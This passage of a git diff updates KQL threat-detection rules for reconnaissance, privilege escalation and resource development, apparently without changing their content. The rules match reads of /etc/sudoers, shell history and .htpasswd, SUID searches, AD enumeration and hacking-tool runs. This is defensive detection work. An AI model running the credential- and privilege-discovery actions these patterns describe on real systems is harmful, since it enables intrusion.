of file diff --git a/KQL/rules/Privilege Escalation/writing_local_admin_share.kql b/KQL/rules/Privilege Escalation/writing_local_admin_share.kql index 19f273fa..4489d5f9 100644 --- a/KQL/rules/Privilege Escalation/writing_local_admin_share.kql +++ b/KQL/rules/Privilege Escalation/writing_local_admin_share.kql @@ -1,11 +1,11 @@ -// Title: Writing Local Admin Share -// Author: frack113 -// Date: 2022-01-01 -// Level: medium -// Description: Aversaries may use to interact with a remote network share using Server Message Block (SMB). -// This technique is used by post-exploitation frameworks. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.lateral-movement, attack.t1546.002 - -DeviceFileEvents +// Title: Writing Local Admin Share +// Author: frack113 +// Date: 2022-01-01 +// Level: medium +// Description: Aversaries may use to interact with a remote network share using Server Message Block (SMB). +// This technique is used by post-exploitation frameworks. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.lateral-movement, attack.t1546.002 + +DeviceFileEvents | where FolderPath contains "\\\\127.0.0" and FolderPath contains "\\ADMIN$\\" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql b/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql index 215c87d7..f68ca9a2 100644 --- a/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql +++ b/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql @@ -1,13 +1,13 @@ -// Title: Xwizard.EXE Execution From Non-Default Location -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-09-20 -// Level: high -// Description: Detects the execution of Xwizard tool from a non-default directory. -// When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll". -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 -// False Positives: -// - Windows installed on non-C drive - -DeviceProcessEvents +// Title: Xwizard.EXE Execution From Non-Default Location +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-09-20 +// Level: high +// Description: Detects the execution of Xwizard tool from a non-default directory. +// When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Windows installed on non-C drive + +DeviceProcessEvents | where (FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql b/KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql index f0903e1c..c8a07206 100644 --- a/KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql +++ b/KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql @@ -1,12 +1,12 @@ -// Title: Access of Sudoers File Content -// Author: Florian Roth (Nextron Systems) -// Date: 2022-06-20 -// Level: medium -// Description: Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights. -// MITRE Tactic: Reconnaissance -// Tags: attack.reconnaissance, attack.t1592.004 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Access of Sudoers File Content +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights. +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1592.004 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ProcessCommandLine contains " /etc/sudoers" and (FolderPath endswith "/cat" or FolderPath endswith "/ed" or FolderPath endswith "/egrep" or FolderPath endswith "/emacs" or FolderPath endswith "/fgrep" or FolderPath endswith "/grep" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nano" or FolderPath endswith "/tail") \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/linux_recon_indicators.kql b/KQL/rules/Reconnaissance/linux_recon_indicators.kql index 2609368d..9be5ce4f 100644 --- a/KQL/rules/Reconnaissance/linux_recon_indicators.kql +++ b/KQL/rules/Reconnaissance/linux_recon_indicators.kql @@ -1,12 +1,12 @@ -// Title: Linux Recon Indicators -// Author: Florian Roth (Nextron Systems) -// Date: 2022-06-20 -// Level: high -// Description: Detects events with patterns found in commands used for reconnaissance on linux systems -// MITRE Tactic: Reconnaissance -// Tags: attack.reconnaissance, attack.t1592.004, attack.credential-access, attack.t1552.001 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Linux Recon Indicators +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-20 +// Level: high +// Description: Detects events with patterns found in commands used for reconnaissance on linux systems +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1592.004, attack.credential-access, attack.t1552.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ProcessCommandLine contains " -name .htpasswd" or ProcessCommandLine contains " -perm -4000 " \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql b/KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql index c692837f..f349e4b1 100644 --- a/KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql +++ b/KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql @@ -1,12 +1,12 @@ -// Title: Potential Active Directory Enumeration Using AD Module - ProcCreation -// Author: frack113 -// Date: 2023-01-22 -// Level: medium -// Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. -// MITRE Tactic: Reconnaissance -// Tags: attack.reconnaissance, attack.discovery, attack.impact -// False Positives: -// - Legitimate use of the library for administrative activity - -DeviceProcessEvents +// Title: Potential Active Directory Enumeration Using AD Module - ProcCreation +// Author: frack113 +// Date: 2023-01-22 +// Level: medium +// Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.discovery, attack.impact +// False Positives: +// - Legitimate use of the library for administrative activity + +DeviceProcessEvents | where (ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ProcessCommandLine contains "Microsoft.ActiveDirectory.Management.dll" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/print_history_file_contents.kql b/KQL/rules/Reconnaissance/print_history_file_contents.kql index 2b58e02d..7e7fdd46 100644 --- a/KQL/rules/Reconnaissance/print_history_file_contents.kql +++ b/KQL/rules/Reconnaissance/print_history_file_contents.kql @@ -1,12 +1,12 @@ -// Title: Print History File Contents -// Author: Florian Roth (Nextron Systems) -// Date: 2022-06-20 -// Level: medium -// Description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance -// MITRE Tactic: Reconnaissance -// Tags: attack.reconnaissance, attack.t1592.004 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Print History File Contents +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1592.004 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (FolderPath endswith "/cat" or FolderPath endswith "/head" or FolderPath endswith "/tail" or FolderPath endswith "/more") and ((ProcessCommandLine contains "/.bash_history" or ProcessCommandLine contains "/.zsh_history") or (ProcessCommandLine endswith "_history" or ProcessCommandLine endswith ".history" or ProcessCommandLine endswith "zhistory")) \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/pua_pingcastle_execution.kql b/KQL/rules/Reconnaissance/pua_pingcastle_execution.kql index 5a938f7f..5f6dcfbb 100644 --- a/KQL/rules/Reconnaissance/pua_pingcastle_execution.kql +++ b/KQL/rules/Reconnaissance/pua_pingcastle_execution.kql @@ -1,10 +1,10 @@ -// Title: PUA - PingCastle Execution -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2024-01-11 -// Level: medium -// Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level. -// MITRE Tactic: Reconnaissance -// Tags: attack.reconnaissance, attack.t1595 - -DeviceProcessEvents +// Title: PUA - PingCastle Execution +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2024-01-11 +// Level: medium +// Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level. +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1595 + +DeviceProcessEvents | where ((MD5 startswith "f741f25ac909ee434e50812d436c73ff" or MD5 startswith "d40acbfc29ee24388262e3d8be16f622" or MD5 startswith "01bb2c16fadb992fa66228cd02d45c60" or MD5 startswith "9e1b18e62e42b5444fc55b51e640355b" or MD5 startswith "b7f8fe33ac471b074ca9e630ba0c7e79" or MD5 startswith "324579d717c9b9b8e71d0269d13f811f" or MD5 startswith "63257a1ddaf83cfa43fe24a3bc06c207" or MD5 startswith "049e85963826b059c9bac273bb9c82ab" or MD5 startswith "ecb98b7b4d4427eb8221381154ff4cb2" or MD5 startswith "faf87749ac790ec3a10dd069d10f9d63" or MD5 startswith "f296dba5d21ad18e6990b1992aea8f83" or MD5 startswith "93ba94355e794b6c6f98204cf39f7a11" or MD5 startswith "a258ef593ac63155523a461ecc73bdba" or MD5 startswith "97000eb5d1653f1140ee3f47186463c4" or MD5 startswith "95eb317fbbe14a82bd9fdf31c48b8d93" or MD5 startswith "32fe9f0d2630ac40ea29023920f20f49" or MD5 startswith "a05930dde939cfd02677fc18bb2b7df5" or MD5 startswith "124283924e86933ff9054a549d3a268b" or MD5 startswith "ceda6909b8573fdeb0351c6920225686" or MD5 startswith "60ce120040f2cd311c810ae6f6bbc182" or MD5 startswith "2f10cdc5b09100a260703a28eadd0ceb" or MD5 startswith "011d967028e797a4c16d547f7ba1463f" or MD5 startswith "2da9152c0970500c697c1c9b4a9e0360" or MD5 startswith "b5ba72034b8f44d431f55275bace9f8b" or MD5 startswith "d6ed9101df0f24e27ff92ddab42dacca" or MD5 startswith "3ed3cdb6d12aa1ac562ad185cdbf2d1d" or MD5 startswith "5e083cd0143ae95a6cb79b68c07ca573" or MD5 startswith "28caff93748cb84be70486e79f04c2df" or MD5 startswith "9d4f12c30f9b500f896efd1800e4dd11" or MD5 startswith "4586f7dd14271ad65a5fb696b393f4c0" or MD5 startswith "86ba9dddbdf49215145b5bcd081d4011" or MD5 startswith "9dce0a481343874ef9a36c9a825ef991" or MD5 startswith "85890f62e231ad964b1fda7a674747ec" or MD5 startswith "599be548da6441d7fe3e9a1bb8cb0833" or MD5 startswith "9b0c7fd5763f66e9b8c7b457fce53f96" or MD5 startswith "32d45718164205aec3e98e0223717d1d" or MD5 startswith "6ff5f373ee7f794cd17db50704d00ddb" or MD5 startswith "88efbdf41f0650f8f58a3053b0ca0459" or MD5 startswith "ef915f61f861d1fb7cbde9afd2e7bd93" or MD5 startswith "781fa16511a595757154b4304d2dd350" or MD5 startswith "5018ec39be0e296f4fc8c8575bfa8486" or MD5 startswith "f4a84d6f1caf0875b50135423d04139f") or (SHA1 startswith "9c1431801fa6342ed68f047842b9a11778fc669b" or SHA1 startswith "c36c862f40dad78cb065197aad15fef690c262f2" or SHA1 startswith "bc8e23faea8b3c537f268b3e81d05b937012272d" or SHA1 startswith "12e0357658614ff60d480d1a6709be68a2e40c5f" or SHA1 startswith "18b33ab5719966393d424a3edbfa8dec225d98fa" or SHA1 startswith "f14c9633040897d375e3069fddc71e859f283778" or SHA1 startswith "08041b426c9f112ad2061bf3c8c718e34739d4fc" or SHA1 startswith "7be77c885d0c9a4af4cecc64d512987cf93ba937" or SHA1 startswith "72dbb719b05f89d9d2dbdf186714caf7639daa36" or SHA1 startswith "5b1498beb2cfb4d971e377801e7abce62c0e315b" or SHA1 startswith "292629c6ab33bddf123d26328025e2d157d9e8fc" or SHA1 startswith "be59e621e83a2d4c87b0e6c69a2d22f175408b11" or SHA1 startswith "0250ce9a716ab8cca1c70a9de4cbc49a51934995" or SHA1 startswith "607e1fa810c799735221a609af3bfc405728c02d" or SHA1 startswith "ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3" or SHA1 startswith "044cf5698a8e6b0aeba5acb56567f06366a9a70a" or SHA1 startswith "ef2dea8c736d49607832986c6c2d6fdd68ba6491" or SHA1 startswith "efffc2bfb8af2e3242233db9a7109b903fc3f178" or SHA1 startswith "5a05d4320de9afbc84de8469dd02b3a109efb2d4" or SHA1 startswith "a785d88cf8b862a420b9be793ee6a9616aa94c84" or SHA1 startswith "5688d56cbaf0d934c4e37b112ba257e8fb63f4ea" or SHA1 startswith "5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17" or SHA1 startswith "81d67b3d70c4e855cb11a453cc32997517708362" or SHA1 startswith "9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad" or SHA1 startswith "09c6930d057f49c1c1e11cf9241fffc8c12df3a2" or SHA1 startswith "e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92" or SHA1 startswith "9e3c992415e390f9ada4d15c693b687f38a492d1" or SHA1 startswith "3f34a5ee303d37916584c888c4928e1c1164f92a" or SHA1 startswith "ea4c8c56a8f5c90a4c08366933e5fb2de611d0db" or SHA1 startswith "3150f14508ee4cae19cf09083499d1cda8426540" or SHA1 startswith "036ad9876fa552b1298c040e233d620ea44689c6" or SHA1 startswith "3a3c1dcb146bb4616904157344ce1a82cd173bf5" or SHA1 startswith "6230d6fca973fa26188dfbadede57afb4c15f75c" or SHA1 startswith "8f7b2a9b8842f339b1e33602b7f926ab65de1a4d" or SHA1 startswith "a586bb06b59a4736a47abff8423a54fe8e2c05c4" or SHA1 startswith "c82152cddf9e5df49094686531872ecd545976db" or SHA1 startswith "04c39ffc18533100aaa4f9c06baf2c719ac94a61" or SHA1 startswith "e082affa5cdb2d46452c6601a9e85acb8446b836" or SHA1 startswith "a075bfb6cf5c6451ce682197a87277c8bc188719" or SHA1 startswith "34c0c5839af1c92bce7562b91418443a2044c90d" or SHA1 startswith "74e10a9989e0ec8fe075537ac802bd3031ae7e08" or SHA1 startswith "3a515551814775df0ccbe09f219bc972eae45a10") or (SHA256 startswith "90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b" or SHA256 startswith "5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85" or SHA256 startswith "e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03" or SHA256 startswith "9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795" or SHA256 startswith "7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f" or SHA256 startswith "9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a" or SHA256 startswith "c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275" or SHA256 startswith "1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b" or SHA256 startswith "768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2" or SHA256 startswith "1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae" or SHA256 startswith "606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6" or SHA256 startswith "b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a" or SHA256 startswith "ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1" or SHA256 startswith "9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559" or SHA256 startswith "c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2" or SHA256 startswith "a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef" or SHA256 startswith "84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d" or SHA256 startswith "c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524" or SHA256 startswith "01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b" or SHA256 startswith "9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b" or SHA256 startswith "63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629" or SHA256 startswith "2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358" or SHA256 startswith "7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca" or SHA256 startswith "e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea" or SHA256 startswith "dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172" or SHA256 startswith "dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4" or SHA256 startswith "8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2" or SHA256 startswith "5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66" or SHA256 startswith "e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27" or SHA256 startswith "75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41" or SHA256 startswith "56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1" or SHA256 startswith "f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0" or SHA256 startswith "845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8" or SHA256 startswith "9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d" or SHA256 startswith "5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726" or SHA256 startswith "37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90" or SHA256 startswith "ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5" or SHA256 startswith "3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140" or SHA256 startswith "d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87" or SHA256 startswith "63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892" or SHA256 startswith "47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054" or SHA256 startswith "7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd")) or FolderPath endswith "\\PingCastle.exe" or ProcessVersionInfoOriginalFileName =~ "PingCastle.exe" or ProcessVersionInfoProductName =~ "Ping Castle" or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ") \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql b/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql index 26f09524..5debb7c9 100644 --- a/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql +++ b/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql @@ -1,10 +1,10 @@ -// Title: PUA - PingCastle Execution From Potentially Suspicious Parent -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2024-01-11 -// Level: high -// Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location. -// MITRE Tactic: Reconnaissance -// Tags: attack.reconnaissance, attack.t1595 - -DeviceProcessEvents +// Title: PUA - PingCastle Execution From Potentially Suspicious Parent +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2024-01-11 +// Level: high +// Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location. +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1595 + +DeviceProcessEvents | where ((InitiatingProcessCommandLine contains ".bat" or InitiatingProcessCommandLine contains ".chm" or InitiatingProcessCommandLine contains ".cmd" or InitiatingProcessCommandLine contains ".hta" or InitiatingProcessCommandLine contains ".htm" or InitiatingProcessCommandLine contains ".html" or InitiatingProcessCommandLine contains ".js" or InitiatingProcessCommandLine contains ".lnk" or InitiatingProcessCommandLine contains ".ps1" or InitiatingProcessCommandLine contains ".vbe" or InitiatingProcessCommandLine contains ".vbs" or InitiatingProcessCommandLine contains ".wsf") or (InitiatingProcessCommandLine contains ":\\Perflogs\\" or InitiatingProcessCommandLine contains ":\\Temp\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\AppData\\Local\\Temp" or InitiatingProcessCommandLine contains "\\AppData\\Roaming\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or ((InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\"))) and (InitiatingProcessCommandLine contains ".bat" or InitiatingProcessCommandLine contains ".chm" or InitiatingProcessCommandLine contains ".cmd" or InitiatingProcessCommandLine contains ".hta" or InitiatingProcessCommandLine contains ".htm" or InitiatingProcessCommandLine contains ".html" or InitiatingProcessCommandLine contains ".js" or InitiatingProcessCommandLine contains ".lnk" or InitiatingProcessCommandLine contains ".ps1" or InitiatingProcessCommandLine contains ".vbe" or InitiatingProcessCommandLine contains ".vbs" or InitiatingProcessCommandLine contains ".wsf") and (FolderPath endswith "\\PingCastle.exe" or ProcessVersionInfoOriginalFileName =~ "PingCastle.exe" or ProcessVersionInfoProductName =~ "Ping Castle" or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/suspicious_git_clone.kql b/KQL/rules/Reconnaissance/suspicious_git_clone.kql index f8589ab0..5eaf3723 100644 --- a/KQL/rules/Reconnaissance/suspicious_git_clone.kql +++ b/KQL/rules/Reconnaissance/suspicious_git_clone.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Git Clone -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-03 -// Level: medium -// Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious -// MITRE Tactic: Reconnaissance -// Tags: attack.reconnaissance, attack.t1593.003 - -DeviceProcessEvents +// Title: Suspicious Git Clone +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-03 +// Level: medium +// Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1593.003 + +DeviceProcessEvents | where (ProcessCommandLine contains " clone " or ProcessCommandLine contains "git-remote-https ") and ((FolderPath endswith "\\git.exe" or FolderPath endswith "\\git-remote-https.exe") or ProcessVersionInfoOriginalFileName =~ "git.exe") and (ProcessCommandLine contains "exploit" or ProcessCommandLine contains "Vulns" or ProcessCommandLine contains "vulnerability" or ProcessCommandLine contains "RemoteCodeExecution" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "CVE-" or ProcessCommandLine contains "poc-" or ProcessCommandLine contains "ProofOfConcept" or ProcessCommandLine contains "proxyshell" or ProcessCommandLine contains "log4shell" or ProcessCommandLine contains "eternalblue" or ProcessCommandLine contains "eternal-blue" or ProcessCommandLine contains "MS17-") \ No newline at end of file diff --git a/KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql b/KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql index 1fcb54bb..a8ab897a 100644 --- a/KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql +++ b/KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Git Clone - Linux -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-03 -// Level: medium -// Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious -// MITRE Tactic: Reconnaissance -// Tags: attack.reconnaissance, attack.t1593.003 - -DeviceProcessEvents +// Title: Suspicious Git Clone - Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-03 +// Level: medium +// Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1593.003 + +DeviceProcessEvents | where (ProcessCommandLine contains " clone " and FolderPath endswith "/git") and (ProcessCommandLine contains "exploit" or ProcessCommandLine contains "Vulns" or ProcessCommandLine contains "vulnerability" or ProcessCommandLine contains "RCE" or ProcessCommandLine contains "RemoteCodeExecution" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "CVE-" or ProcessCommandLine contains "poc-" or ProcessCommandLine contains "ProofOfConcept" or ProcessCommandLine contains "proxyshell" or ProcessCommandLine contains "log4shell" or ProcessCommandLine contains "eternalblue" or ProcessCommandLine contains "eternal-blue" or ProcessCommandLine contains "MS17-") \ No newline at end of file diff --git a/KQL/rules/Resource Development/creation_of_a_diagcab.kql b/KQL/rules/Resource Development/creation_of_a_diagcab.kql index 9806f518..0e0dd198 100644 --- a/KQL/rules/Resource Development/creation_of_a_diagcab.kql +++ b/KQL/rules/Resource Development/creation_of_a_diagcab.kql @@ -1,12 +1,12 @@ -// Title: Creation of a Diagcab -// Author: frack113 -// Date: 2022-06-08 -// Level: medium -// Description: Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location) -// MITRE Tactic: Resource Development -// Tags: attack.resource-development -// False Positives: -// - Legitimate microsoft diagcab - -DeviceFileEvents +// Title: Creation of a Diagcab +// Author: frack113 +// Date: 2022-06-08 +// Level: medium +// Description: Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location) +// MITRE Tactic: Resource Development +// Tags: attack.resource-development +// False Positives: +// - Legitimate microsoft diagcab + +DeviceFileEvents | where FolderPath endswith ".diagcab" \ No newline at end of file diff --git a/KQL/rules/Resource Development/hacktool_purplesharp_execution.kql b/KQL/rules/Resource Development/hacktool_purplesharp_execution.kql index 2f2efedc..1e1b3d91 100644 --- a/KQL/rules/Resource Development/hacktool_purplesharp_execution.kql +++ b/KQL/rules/Resource Development/hacktool_purplesharp_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - PurpleSharp Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2021-06-18 -// Level: critical -// Description: Detects the execution of the PurpleSharp adversary simulation tool -// MITRE Tactic: Resource Development -// Tags: attack.t1587, attack.resource-development -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - PurpleSharp Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-06-18 +// Level: critical +// Description: Detects the execution of the PurpleSharp adversary simulation tool +// MITRE Tactic: Resource Development +// Tags: attack.t1587, attack.resource-development +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "xyz123456.exe" or ProcessCommandLine contains "PurpleSharp") or (FolderPath contains "\\purplesharp" or ProcessVersionInfoOriginalFileName =~ "PurpleSharp.exe") \ No newline at end of file diff --git a/KQL/rules/Resource 